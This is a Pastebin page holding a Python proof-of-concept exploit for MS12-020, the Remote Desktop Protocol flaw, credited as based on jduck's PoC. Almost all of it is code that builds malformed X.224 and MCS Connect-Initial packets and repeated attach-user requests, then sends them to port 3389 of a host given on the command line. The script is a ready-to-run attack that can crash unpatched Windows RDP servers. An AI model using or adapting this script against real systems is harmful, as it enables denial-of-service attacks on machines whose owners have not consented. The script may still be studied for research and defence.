Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # ms12-020 PoC attempt
- #
- # based on jduck PoC
- #
- import sys
- import socket
- from struct import pack,unpack
- host = sys.argv[1]
- def make_tpkt(data):
- return pack("!BBH", 3, 0, 4+len(data)) + data
- def make_x224(type, data):
- return pack("!BB", 1+len(data), type) + data
- def make_rdp(type, flags, data):
- return pack("<BBH", type, flags, 4+len(data)) + data
- # craft connection request
- # x224 type 0xe0
- # - dst_ref, src_ref, class_opts, data
- rdp = make_rdp(1, 0, pack("!I", 0))
- x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0) + rdp)
- pkt = make_tpkt(x224_1)
- # x224 type 0xf0 (Data TPDU)
- # - EOT (0x80)
- x224_2 = make_x224(0xf0, pack("!B", 0x80))
- # craft connect-initial with gcc
- # mcsCi
- target_params = (""+
- #"\x02\x01\x00"+ # maxChannelIds
- "\x02\x01\x22"+ # maxChannelIds
- "\x02\x01\x0a"+ # maxUserIds
- "\x02\x01\x00"+ # maxTokenIds
- "\x02\x01\x01"+ # numPriorities
- "\x02\x01\x00"+ # minThroughput
- "\x02\x01\x01"+ # maxHeight
- "\x02\x02\xff\xff"+ # maxMCSPDUSize
- "\x02\x01\x02" # protocolVersion
- )
- min_params = (""+
- "\x02\x01\x01"+ # maxChannelIds
- "\x02\x01\x01"+ # maxUserIds
- "\x02\x01\x01"+ # maxTokenIds
- "\x02\x01\x01"+ # numPriorities
- "\x02\x01\x00"+ # minThroughput
- "\x02\x01\x01"+ # maxHeight
- "\x02\x02\x04\x20"+ # maxMCSPDUSize
- "\x02\x01\x02" # protocolVersion
- )
- max_params = (""+
- "\x02\x02\xff\xff"+ # maxChannelIds
- "\x02\x02\xfc\x17"+ # maxUserIds
- "\x02\x02\xff\xff"+ # maxTokenIds
- "\x02\x01\x01"+ # numPriorities
- "\x02\x01\x00"+ # minThroughput
- "\x02\x01\x01"+ # maxHeight
- "\x02\x02\xff\xff"+ # maxMCSPDUSize
- "\x02\x01\x02" # protocolVersion
- )
- userdata = (""+
- # gccCCrq
- "\x00\x05\x00\x14"+
- "\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
- # clientCoreData
- "\x01\xc0"+"\xd8\x00"+ # header (type, len)
- "\x04\x00"+"\x08\x00"+ # version
- "\x80\x02"+ # desktop width
- "\xe0\x01"+ # desktop height
- "\x01\xca"+ # color depth
- "\x03\xaa"+ # SASSequence
- "\x09\x04\x00\x00" + # keyboard layout
- "\xce\x0e\x00\x00" + # client build number
- # client name
- "\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x04\x00\x00\x00"+ # keyboard type
- "\x00\x00\x00\x00"+ # kbd subType
- "\x0c\x00\x00\x00"+ # kbd FuncKey
- # imeFileName
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x01\xca"+ # postBeta2ColorDepth
- "\x01\x00"+ # clientProductId
- "\x00\x00\x00\x00" + # serialNumber
- "\x10\x00"+ # highColorDepth
- "\x07\x00"+ # supportedColorDepths
- "\x01\x00"+ # earlyCapabilityFlags
- # clientDigProductId -poc has: "00000-000-0000000-00000"
- "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
- "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
- "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
- "\x00"+ # connectionType
- "\x00"+ # pad1octet
- "\x00\x00\x00\x00"+ # serverSelectedProtocol
- "\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
- "\x0d\x00\x00\x00"+ # desktopPhysicalHeight
- "\x00\x00\x00\x00"+ # reserved
- # clientSecurityData
- "\x02\xc0"+"\x0c\x00"+ # header (type, len)
- "\x1b\x00\x00\x00"+ # encryptionMethods
- "\x00\x00\x00\x00"+ # extEncryptionMethods
- # clientNetworkData
- "\x03\xc0"+"\x2c\x00"+ # header (type, len)
- "\x03\x00\x00\x00"+ # channel count!
- # channel 0
- "rdpdr\x00\x00\x00"+ # name
- "\x00\x00\x80\x80"+ # options
- # channel 1
- "cliprdr\x00"+ # name
- "\x00\x00\xa0\xc0"+ # options
- # channel 2
- "rdpsnd\x00\x00"+ # name
- "\x00\x00\x00\xc0" # options
- # clientClusterData (not present)
- # clientMonitorData (not present)
- )
- mcs_data = (""+
- "\x04\x01\x01"+ # callingDomainSelector
- "\x04\x01\x01"+ # calledDomainSelector
- "\x01\x01\xff"+ # upwardFlag
- "\x30" + pack("B", len(target_params)) + target_params +
- "\x30" + pack("B", len(min_params)) + min_params +
- "\x30" + pack("B", len(max_params)) + max_params +
- # userData
- "\x04\x82" + pack("!H", len(userdata)) + userdata
- )
- # \x7f\x65 BER: Application-Defined Type = APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
- mcs = "\x7f\x65"
- mcs += "\x82" + pack("!H", len(mcs_data)) # BER: mcs_data length
- pkt += make_tpkt(x224_2 + mcs + mcs_data)
- # craft erect domain request
- #pkt += make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
- # craft attach user request
- pkt += make_tpkt(x224_2 + "\x28")*8 # !!!
- # craft channel join request
- pkt += make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0") # join channel 1008
- pkt += make_tpkt(x224_2 + "\x21\x80") # seem very important!!!
- sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sk.settimeout(1)
- sk.connect((host,3389))
- sk.send(pkt)
- data = sk.recv(4096)
- print len(data)
- sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement